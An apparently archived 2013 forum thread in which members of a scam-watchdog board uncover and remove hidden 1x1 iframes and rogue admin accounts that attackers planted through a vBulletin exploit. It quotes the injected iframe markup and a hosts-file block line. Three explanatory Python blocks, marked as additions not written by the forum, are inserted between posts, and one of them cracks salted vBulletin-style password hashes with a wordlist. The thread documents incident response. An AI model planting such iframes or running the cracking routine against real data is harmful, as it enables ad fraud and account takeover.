Strange Connections



wserra
09-04-2013, 06:38 PM
I'm probably about to embarrass myself again, but the board is doing something which to my non-expert eye seems strange.

When I just logged on, the board made various quick connections to and from sites such as googleleads, doubleclick, contextweb, adnxs and others. Those are advertising/tracking sites. It seems a fair assumption that the board was sending them my IP. Sites such as these build profiles of individuals' browsing habits to sell them. I don't log in that often, but this has happened the last couple of times I did.

In addition, just now and the last time I logged in McAfee blocked a connection the board attempted to make to an IP it deemed unsafe, 216.38.163.167. This resolves to something called "Mirror Image (http://www.mirror-image.com/)". I'm not sure either why McAfee thinks it unsafe or why the board attempted the connection, but thought I'd relate it.

You guys know about this?

littleroundman
09-04-2013, 07:47 PM
Your concerns are not strange at all, Wes.

I'm not sure why McAfee is blocking mirror-image.com. My security software is not.

mirror-image.com is a completely reputable Content Delivery Network, essential for the smooth operating of many websites

Mirror Image Internet is more than just a Content Delivery Network (CDN). Our patented, global Dynamic Delivery Network (DDN) solutions leverage the unlimited capacity of our global Content Access Point® (CAP) network to guarantee availability and unsurpassed performance—even during peak traffic periods


FYI, many of the connections are to graphics members have included in posts. The forum links to the graphics source and retrieves the image every time someone attempts to view it.

This is one of the reasons many forums discourage the use of linked graphics. Such linking consumes bandwidth and server capacity and can lead to graphic-heavy pages loading slowly (as happens in any of the graphic-heavy posts in the cash gifting subforum (http://www.realscam.com/f42/) here on REALSCAM.com (http://www.realscam.com)).

As I post, the forum is linking to:

ajax.googleapis.com
ajax.googleapis.com (http://ajax.googleapis.com) is a CDN repository for the popular jQuery JavaScript functionality plus others that modern websites utilise. If you block this then you will stop the website functioning as it was designed to work.

damnxd.com
We are the best Funny Pics website on the web. We update our site everyday with hundreds of new funny pics.

jobless-jack.com
Jobless Jack | MEME | TROLLS | CLOSE ENOUGH | FUNN

weirdstuffs.com
BBM Display Pictures | Facebook Covers | Jokes

Facebook.com

Google.com

I would encourage anyone using Firefox who is concerned with cross-site requests to install the RequestPolicy (https://www.requestpolicy.com/) Firefox addon:
RequestPolicy is an extension for Mozilla browsers that increases your browsing privacy (https://www.requestpolicy.com/privacy.html), security (https://www.requestpolicy.com/security.html), and speed by giving you control over cross-site requests.

wserra
09-04-2013, 08:22 PM
lijit.com, w55c.net, c3tag.com, burstnet.com and several more. And all of these sites are leaving tracking cookies - I just checked. I normally use Firefox, so I just fired up Chrome - same connections.

I agree that I don't know why McAfee is suspicious of Mirror Image. And I agree that the connections you listed simply serve to retrieve legitimate content. But all of the sites (other than Mirror Image) I listed are in the tracking and selling business. This is not the worst thing in the world, but other sites don't do it.

Thanks for your reply, LRM, but I still think it's strange.

littleroundman
09-04-2013, 08:47 PM
That's strange, Wes.

I'm not getting any of those tracking cookie requests, nor do I have any of them showing in my cookie folder.

We'll check it out.

Thanks for the info

Whip
09-05-2013, 09:35 PM
I had an 'ad.yieldmanager' popup on my phone from here the other day.

ribshaw
09-05-2013, 10:32 PM
OK, I have had this happen twice: ads have started to play on my computer, almost like a video ad. As soon as I shut down the site, the ad stops. It happened yesterday and just a second ago.

wserra
09-06-2013, 08:52 AM
It's continuing for me as well. If it helps, a few more connections: hiroserver.com, invitemedia.com, dotomi.com, advertising/tracking sites all. And there are more. I don't think any of these are dangerous, but why is the board doing that?

ProfHenryHiggins
09-06-2013, 09:00 AM
I've also been seeing a barrage of unfamiliar sites loading when I visit the Realscam homepage.
Could something have slipped past Jason and gotten embedded? Or another 1-pixel graphic like MMB pulled on us a while back?


On the other hand, I don't get the video ad popup, probably due to how my system is set up.

Soapboxmom
09-06-2013, 09:21 AM
A while back I kept seeing embedded links in posts and I assumed it was the site. After some investigation it turned out my computer was infected. I was the only one at that time seeing the live links popping up all over the place.

As for the issues several of you are experiencing I am not seeing anything. I will alert Jason and Glim. The owner has been tied up but will be checking it out as well. All this does make me miss the simple times and my dial phone just a wee bit!

NikSam
09-06-2013, 09:32 AM
There is definitely something wrong: on a dry run, accessing forum.php launches a rollercoaster of cookies from other sites; it looks like they all originate first from jobless-jack.com
and damnxd.org (and this is on a page which does not have any non-stock images).


Jason, what is the purpose of having these iframe lines included in forum.php?



<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->

<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>

</div>


The comment about "do not remove" looks very fishy to me
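As an added example (not code from the thread, from vBulletin, or from the forum's own pages), the script below does mechanically what NikSam did by eye: it parses a page's HTML, lists every third-party host that img, script and iframe tags pull content from (the kind of unexplained connections wserra and littleroundman were listing earlier in the thread), and flags iframes that are sized 1x1 or styled invisible, which is exactly the shape of the injected footer above. The sample HTML is constructed here from that footer plus a placeholder jQuery script tag and a logo image path; those two extras are assumptions for the demo, not taken from the live site.

```python
"""Report third-party embeds and hidden iframes in a page's HTML.

Added example, not from the thread or from vBulletin. Standard library only,
so it can be pointed at a saved copy of any page.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the injected footer quoted in the thread, plus an
# assumed stock-looking script tag and image so both kinds of embed show up.
SAMPLE_HTML = """
<html><body>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
<img src="/images/misc/vbulletin4_logo.png">
<div id="footer_morecopyright" class="shade footer_morecopyright">
<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>
</div>
</body></html>
"""

EMBED_TAGS = {"img", "script", "iframe", "embed", "object"}


def _tiny(value):
    """True for width/height attributes of 1 pixel or less ("1", "0", "1px")."""
    try:
        return int(str(value).rstrip("px")) <= 1
    except ValueError:
        return False


class EmbedScanner(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.third_party = []     # (tag, host, src) for every off-site embed
        self.hidden_iframes = []  # src of each iframe that a visitor cannot see

    def handle_starttag(self, tag, attrs):
        if tag not in EMBED_TAGS:
            return
        a = dict(attrs)
        src = a.get("src") or a.get("data") or ""
        host = urlparse(src).hostname
        if host and host.lower() != self.site_host:
            self.third_party.append((tag, host.lower(), src))
        if tag == "iframe" and self._is_hidden(a):
            self.hidden_iframes.append(src)

    @staticmethod
    def _is_hidden(a):
        style = (a.get("style") or "").replace(" ", "").lower()
        return ((_tiny(a.get("width")) and _tiny(a.get("height")))
                or "display:none" in style or "visibility:hidden" in style)


def scan(html, site_host):
    """Return the sorted set of third-party hosts and the list of hidden iframe sources."""
    parser = EmbedScanner(site_host)
    parser.feed(html)
    return {
        "third_party_hosts": sorted({host for _, host, _ in parser.third_party}),
        "hidden_iframes": parser.hidden_iframes,
    }


if __name__ == "__main__":
    report = scan(SAMPLE_HTML, "www.realscam.com")
    for host in report["third_party_hosts"]:
        print("third-party host:", host)
    for src in report["hidden_iframes"]:
        print("HIDDEN IFRAME:   ", src)
```

A legitimate CDN such as ajax.googleapis.com shows up in the host list but not as a hidden iframe; the two injected frames show up in both, which is the signal worth alerting on. Run it against a page saved with the browser's "view source" rather than a rendered DOM so that script-inserted elements don't hide the static injection.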

wserra
09-09-2013, 01:40 PM
The same thing is happening from my office computer.

Fendaril
09-09-2013, 08:14 PM
All this does make me miss the simple times and my dial phone just a wee bit!

I was never alive for the simple times, but I feel ya.

Whip
09-09-2013, 10:19 PM
I don't automatically accept cookies, so I got to see these, which just asked to be set when I tried to access this site from a different computer:

widget3.linkwithin.com
widget5.linkwithin.com
widget6.linkwithin.com
jobless-jack.com
damnxd.org
whos.amung.us
rc.rlcdn.com
lb.adnxs.com
idsync.rlcdn.com

scratchycat
09-11-2013, 02:17 PM
There is definitely something wrong: on a dry run, accessing forum.php launches a rollercoaster of cookies from other sites; it looks like they all originate first from jobless-jack.com
and damnxd.org (and this is on a page which does not have any non-stock images).

Jason, what is the purpose of having these iframe lines included in forum.php?

Have been occupied with moving to a new place but I reported it to SBM the other day when I started getting all these weird links popping up. I am mainly using Chrome now and it does not happen on any other sites that I visit. As of 9/11/2013, it is still happening when I login to RS.

NikSam
09-13-2013, 06:06 AM
So, is anybody gonna remove that infected HTML code?

As the VB original template shows:


<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
{vb:raw cronimage}
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
{vb:raw vboptions.copyrighttext}
</div>


Those infectious iframes are more likely coming from the vboptions.copyrighttext variable,
resulting in:


<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->

<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>

</div>


Please verify that this code was put there by someone in AdminCP > Settings > Options > Site Name / URL / Contact Details > Copyright Text

And change admin passwords. (It might also have come from penetrating the MySQL db.)

NikSam
09-13-2013, 06:30 AM
UPDATE: It seems to be a VB exploit, so make sure to install the latest fixes so it doesn't happen again after removal of the Copyright Text;
check for suspicious new admin accounts, PHP files which did not come from the stock vBulletin setup, and modifications to stock PHP files.

https://forums.digitalpoint.com/threads/site-exploited-by-recent-0-day-reported-by-vbulletin-ad-code-inserted.2679354/


To remove the Copyright Text, as pointed out there:


You should be able to go into your options and edit the copyrighttext field. I think it might be hidden, so you will need to be in debug mode to see it in there.



more details on the exploit: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5
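An added example, not from the thread or from vBulletin, of running the checks in the two posts above as queries instead of clicking through the AdminCP: markup that can load remote content in the copyright text setting, accounts that hold administrator rights (primary usergroup 6, secondary membership in group 6, or a row in the administrator table) but are not on the owner's known-good list, and accounts created recently. Table and column names follow the vBulletin 3/4 schema (setting.varname/value, user.usergroupid/membergroupids/joindate, administrator.userid, usergroup 6 = Administrators); the rows, the known-admin set and the two rogue accounts are constructed in an in-memory SQLite database so the script runs offline. On a live forum the same SELECTs go through the MySQL client or a dump.

```python
"""Post-compromise audit queries for a vBulletin 4 database.

Added example, not code from the thread or from vBulletin. Sample rows are
constructed in SQLite; the SQL itself is what you would run against MySQL.
"""
import re
import sqlite3
import time

ADMIN_GROUP = 6                      # vBulletin's default Administrators usergroup
KNOWN_ADMINS = {"adminrealscam"}     # assumed: whoever the owner knows is legitimate
WEEK = 7 * 86400
EMBED_RE = re.compile(r"<\s*(iframe|script|object|embed)\b", re.I)


def build_sample_db(now):
    """Constructed data shaped like the vBulletin tables the queries target."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE setting (varname TEXT PRIMARY KEY, value TEXT);
        CREATE TABLE user (userid INTEGER PRIMARY KEY, username TEXT,
                           usergroupid INTEGER, membergroupids TEXT, joindate INTEGER);
        CREATE TABLE administrator (userid INTEGER PRIMARY KEY);
    """)
    injected = ('<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1">'
                '</iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" '
                'height="1"></iframe><br/>')
    conn.executemany("INSERT INTO setting VALUES (?, ?)", [
        ("copyrighttext", injected),
        ("bbtitle", "REALSCAM.com"),
    ])
    conn.executemany("INSERT INTO user VALUES (?, ?, ?, ?, ?)", [
        (1, "adminrealscam", ADMIN_GROUP, "", now - 400 * 86400),
        (2, "wserra", 2, "", now - 200 * 86400),
        (3, ".", ADMIN_GROUP, "", now - 5 * 86400),   # rogue admin via primary group
        (4, "sky22", 2, "6", now - 4 * 86400),        # rogue admin via secondary group
    ])
    conn.executemany("INSERT INTO administrator VALUES (?)", [(1,), (3,), (4,)])
    return conn


def settings_with_embeds(conn):
    """Setting names whose value carries iframe/script/object/embed markup."""
    rows = conn.execute("SELECT varname, value FROM setting")
    return sorted(name for name, value in rows if value and EMBED_RE.search(value))


def unexpected_admins(conn):
    """Usernames holding admin rights by any of the three routes, minus the known set."""
    admins = {}
    for uid, name, gid, mgids in conn.execute(
            "SELECT userid, username, usergroupid, membergroupids FROM user"):
        secondary = {int(g) for g in (mgids or "").split(",") if g.strip()}
        if gid == ADMIN_GROUP or ADMIN_GROUP in secondary:
            admins[uid] = name
    for uid, name in conn.execute(
            "SELECT u.userid, u.username FROM administrator a "
            "JOIN user u ON u.userid = a.userid"):
        admins[uid] = name
    return sorted(n for n in admins.values() if n not in KNOWN_ADMINS)


def recent_accounts(conn, now, window=WEEK):
    """Usernames created inside the window; compare against what you expected to see."""
    rows = conn.execute("SELECT username FROM user WHERE joindate >= ?", (now - window,))
    return sorted(name for (name,) in rows)


if __name__ == "__main__":
    now = int(time.time())
    db = build_sample_db(now)
    print("settings carrying embeds:", settings_with_embeds(db))
    print("unexpected admins:      ", unexpected_admins(db))
    print("created in last 7 days: ", recent_accounts(db, now))
```

Checking the secondary-group column and the administrator table matters: an account whose primary group is plain Registered can still be an admin through membergroupids, so a query on usergroupid alone would miss the second rogue account. Clearing the setting and deleting the accounts is the cleanup; the patch from vbulletin.com is what stops the next one.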

Soapboxmom
09-13-2013, 07:02 AM
Thanks for the info. We will get the owner on it this weekend.

wserra
09-13-2013, 08:08 AM
See the PC World article (http://www.pcworld.com/article/2047787/vbulletin-users-warned-of-potential-exploit.html) as well. Especially this part:
It’s not clear what the exploit currently being investigated would allow potential attackers to do, but the fact that it prompted an advance warning from the developers suggests that it might have serious implications.

Luke [vBulletin tech guru - WS] declined to disclose information about the nature of the exploit.

I don't like that. I suggest that users must view their passwords to this site as compromised - if you use your RS password for anything else that matters to you, you ought to change the others. Now.

And why on God's green earth would anyone not delete the install directory? I think I recall that phpBB (which Quatloos runs on) won't even start until the install directory is gone.

I would even consider shutting down the board until this is fixed.

NikSam
09-13-2013, 08:43 AM
... I suggest that users must view their passwords to this site as compromised ...

Passwords in VB are stored as hashes, so if it is not a dictionary word, short, or easy to brute force, it is not likely to be compromised.

But I agree: as a general rule never use the same password for different sites. Get a password management program if you must,
or at least come up with a scheme to generate passwords for sites (like mypass_gm for GMail).
The most critical password a person has is to their email; even if you think there is nothing there worth reading for someone, it can be used
to reset your passwords on other sites (banks, PayPal, etc.).
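To make the "stored as hashes" point concrete, here is an added example (not from the thread or from vBulletin) that reproduces the scheme vBulletin 3.x and 4.x use, md5(md5(password) + salt) with a per-user random salt (3 characters before 3.8.5, 30 afterwards), and runs a small dictionary attack against two constructed accounts. The salt defeats precomputed tables but does nothing against a fast offline run over a leaked user table, so the password's length and randomness are what actually decide the outcome. The usernames, passwords, wordlist and the guess rate used for the cost estimate are all assumptions for the demonstration.

```python
"""Dictionary attack against vBulletin-style password hashes.

Added example, not code from the thread or from vBulletin. Users, passwords,
the wordlist and the guess rate are constructed for the demo.
"""
import hashlib
import secrets
import string

WORDLIST = ["password", "letmein", "123456", "qwerty", "monkey", "dragon", "realscam"]


def vb_hash(password, salt):
    """md5(md5(password) + salt), hex-encoded, as vBulletin 3/4 stores it."""
    inner = hashlib.md5(password.encode()).hexdigest()
    return hashlib.md5((inner + salt).encode()).hexdigest()


def make_user(username, password, salt_len=30):
    """A constructed row with the fields a leaked vBulletin user table carries."""
    alphabet = string.ascii_letters + string.digits
    salt = "".join(secrets.choice(alphabet) for _ in range(salt_len))
    return {"username": username, "salt": salt, "password": vb_hash(password, salt)}


def candidates(word):
    """A few common mangling rules: case variants, then a 0-99 suffix on each."""
    bases = [word, word.capitalize(), word.upper()]
    return bases + [b + str(n) for b in bases for n in range(100)]


def crack(user, words):
    """Return the plaintext if any wordlist-derived guess matches, else None."""
    for word in words:
        for guess in candidates(word):
            if vb_hash(guess, user["salt"]) == user["password"]:
                return guess
    return None


def exhaustive_seconds(length, alphabet_size, guesses_per_second):
    """Worst-case time to try every password of the given length and alphabet."""
    return alphabet_size ** length / guesses_per_second


if __name__ == "__main__":
    weak = make_user("sky22", "Monkey42")              # dictionary word + two digits
    strong = make_user("ribshaw", "5ksjel48frl248")    # 14 random lowercase+digits
    print("weak   ->", crack(weak, WORDLIST))           # Monkey42
    print("strong ->", crack(strong, WORDLIST))         # None
    # 1e10 guesses/s is an assumed rate for illustration; measure your own hardware.
    years = exhaustive_seconds(14, 36, 1e10) / (365 * 86400)
    print(f"exhausting 14-char [a-z0-9] at 1e10/s: {years:,.0f} years")
```

The weak account falls to a seven-word list with trivial mangling; the random 14-character one is out of reach of any wordlist and, with 36^14 possibilities, of exhaustive search too. That is the distinction in the post above, and it is also why the advice to change a reused password still stands: nobody but the user knows which side of that line their password is on.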

wserra
09-13-2013, 09:00 AM
Passwords in VB are stored as hashes, so if it is not a dictionary word, short, or easy to brute force, it is not likely to be compromised.

So were the passwords in ubuntuforums.org, also running VB, hacked a couple of months ago (perhaps in part by the same exploit). Nonetheless, IIRC, the Ubuntu folks advised everyone to change passwords, especially if used on other sites. No?

NikSam
09-13-2013, 09:08 AM
Ok, I already spotted newly created Administrators:
View Profile: . (http://www.realscam.com/members/-/)
View Profile: sky22 (http://www.realscam.com/members/sky22/)

wserra
09-13-2013, 09:15 AM
Ok, I already spotted newly created Administrators:
View Profile: . (http://www.realscam.com/members/-/)
View Profile: sky22 (http://www.realscam.com/members/sky22/)

Both created last week.

Dum-da-DUM-DUM.

ribshaw
09-13-2013, 09:16 AM
Would someone update the non-techy users as to what this means and a course of action? I am running AVG Internet Security, and recently added Malwarebytes at the suggestion of another forum member. So far my scans come back clean, but I have no idea what any of this means behind the scenes.

NikSam
09-13-2013, 09:20 AM
Ribshaw, your protections are only good for your own PC.

RS itself has been compromised/hacked/penetrated by exploiting
a programming mistake in the vBulletin software on which this forum runs.

Whoever put those hidden iframes there is just generating views to their ads, even though you cannot see those ads (they are hidden in two 1x1 frames at the bottom, which are invisible).

But since the vulnerability is not addressed, anybody else can repeat the hack for other purposes, and perhaps already did too.
They can steal the database of users, install additional backdoors, modify content, etc.

wserra
09-13-2013, 09:52 AM
Think of it as RS having gained two new admins from the Russian mob.

NikSam
09-13-2013, 10:03 AM
Think of it as RS having gained two new admins from the Russian mob.

And a Russian guy (such as me) spotted them first.
Same mentality?

wserra
09-13-2013, 10:49 AM
Same mentality?

Never, pal!

EagleOne
09-13-2013, 02:37 PM
If they can already access your password for RS, what good does it do to change it? They would still be able to get the new one, wouldn't they? If so, you'd need to wait until it is fixed, then reset to a new password and then change that password if used on other sites, etc. Does that make sense, or am I just ignorant of how this all works?

wserra
09-13-2013, 03:06 PM
If they can already access your password for RS, what good does it do to change it? They would still be able to get the new one, wouldn't they?


if you use your RS password for anything else that matters to you, you ought to change the others.

Emphasis supplied.

ribshaw
09-13-2013, 03:33 PM
As a tip on the whole password thing that I thought was brilliant, but then... I set up separate passwords for every account I have, generally 12+ letters plus numbers, nonsense stuff like 5ksjel48frl248. Obviously I had to write them down, so then I set my Windows password to something hard to crack but easy for me to remember so it does not have to be written down. Of course most cyber attacks will come from external sources, but if someone busts into my office and finds the password list they will still be SOL.

wserra
09-14-2013, 07:30 AM
As a tip on the whole password thing

Two other tips: KeePass (http://keepass.info/). DashLane (https://www.dashlane.com/). I use the latter.

littleroundman
09-14-2013, 09:34 AM
Another excellent free password manager browser addon is LastPass (https://lastpass.com/)

ribshaw
09-14-2013, 11:16 AM
Another excellent free password manager browser addon is LastPass (https://lastpass.com/)

For most of my non-financial sites (RS, Gmail, FB, etc.) the passwords are stored with the browser somehow. On financial sites none of my passwords are stored, and the sites usually have some additional level of browser protection (prompting additional questions upon login from a different IP). My question is, with one of the password managers, what happens if your computer becomes compromised? Could someone not then log in as if they were you?

wserra
09-14-2013, 11:25 AM
My question is with one of the password managers, what happens if your computer becomes compromised? Could someone not then log in as if they were you?

DashLane (and I think KeePass and LastPass as well) has a master password you need to enter once to start the app. It's the only one you need to remember.

wserra
09-14-2013, 11:31 AM
BTW, I see you guys got rid of the new admins. You should be aware that I still get all the connections that made me start the thread, though. There is pretty clearly some rogue code still floating around, which may well allow the hacker to make new admins.

Fendaril
09-14-2013, 12:19 PM
Just blame everything on Ken Russo.

Honestly after that painfully long DDoS attack I wouldn't be surprised if someone was paid off to mess with the site.

I hope im wrong.

path2prosperity
09-14-2013, 12:39 PM
Just blame everything on Ken Russo.


Or BoggyBoy Fiedur!

My bet is on BoggyBoy as Ken cannot speak Russian and probably does not know the Cyrillic alphabet.

baylee
09-14-2013, 01:49 PM
Just blame everything on Ken Russo.

Honestly after that painfully long DDoS attack I wouldn't be surprised if someone was paid off to mess with the site.

I hope im wrong.

I hope you're wrong also, but it makes a lot of sense.

ribshaw
09-14-2013, 04:35 PM
Perhaps this is one of the new admins. They sent me a message over on Facebook, some gibberish. When I checked his friends list, shock of all shockers, many claim to be hackers or have that Guy Fawkes mask as their profile pic. https://www.facebook.com/farenzy.turke

Good thing Facebook takes things seriously.


Fendaril
09-14-2013, 05:35 PM
What grand scheme did you guys uncover to garner a fan base that is willing to take over ownership of a scam board full of people who use ad-blockers anyway?

littleroundman
09-14-2013, 08:53 PM
Just blame everything on Ken Russo.

Honestly after that painfully long DDoS attack I wouldn't be surprised if someone was paid off to mess with the site.

I hope im wrong.

Believe me, the forum is constantly under multiple forms of attack.

The fact readers don't see it and we don't talk about it doesn't mean it isn't happening.

We must be doing something right. :RpS_wink:

EagleOne
09-15-2013, 01:15 AM
Well, the site still loads slow for me, as well as accessing the threads. I was hoping once this issue was fixed that would solve the problem. I keep running scans (malware and virus) thinking it might be at my end, but my system is safe. I ran four different virus programs and nothing found. Anyone else having the site load slow for them, or am I the only one?

littleroundman
09-15-2013, 01:37 AM
The boss is in his counting house, counting out his money upgrading the software as we speak, so most of the problems should be fixed.

Other than that, the forum is loading normally for me.

NikSam
09-15-2013, 03:45 AM
127.0.0.1 damnxd.org www.jobless-jack.com


As a temporary solution, everyone can add this line to their hosts file;
it will break connections to those ad sites.
Location of the hosts file:

WIN - C:\Windows\System32\drivers\etc\hosts
MAC & LINUX - /etc/hosts

more info: Patching the Hosts File to Stop Hackers and Block Websites | PC Memoirs (http://pcmemoirs.com/2011/07/07/patching-the-hosts-file-to-stop-hackers-and-block-websites/)

ProfHenryHiggins
09-15-2013, 04:00 AM
Still seeing the odd extra sites loading.

adminrealscam
09-15-2013, 10:55 AM
Removed the code below from the footer templates.

<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
{vb:raw cronimage}
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
{vb:raw vboptions.copyrighttext}
{vb:raw template_hook.footer_copyright}
</div>

The hackers that created admin accounts using the upgrade.php hole must have added this code to the footer templates.
Firefox is no longer showing these redirects at the bottom of each page.

adminrealscam
09-15-2013, 12:38 PM
Well that was dumb. The place where the injected crap was put was the copyright text in the AdminCP. It just took friggin' forever to figure this one out.

Site Name / URL / Contact Details

EagleOne
09-15-2013, 01:05 PM
Thanks for fixing it! Now it loads like always....FAST! Tell everyone involved thanks for fixing this. It is appreciated.

NikSam
09-15-2013, 02:45 PM
Well that was dumb. The place where the injected crap was put was the copyright text in the AdminCP. It just took friggin' forever to figure this one out.

Site Name / URL / Contact Details

Forever? I told you exactly that it is in the copyrighttext variable.

Every other site infected with those iframes was done the same way.

Fendaril
09-15-2013, 04:06 PM
Well at-least it didn't take almost a month to fix like the DDoS.

So it looks like some wannabe hackers exploited a common bug that was passed around the hacker community. They probably just read some guide on how to break vBulletin (insert version here) and got supa-excited about it!

It took all but a few days to fix it, and now RS has more publicity. Brilliant plan Russian geek squad crew.

adminrealscam
09-15-2013, 05:53 PM
Forever? I told you exactly that it is in the copyrighttext variable.

Every other site infected with those iframes was done the same way.


You the man NikSam.
Once I read through all the posts and read yours I was able to remove the crap. Forever to me is more than 30min.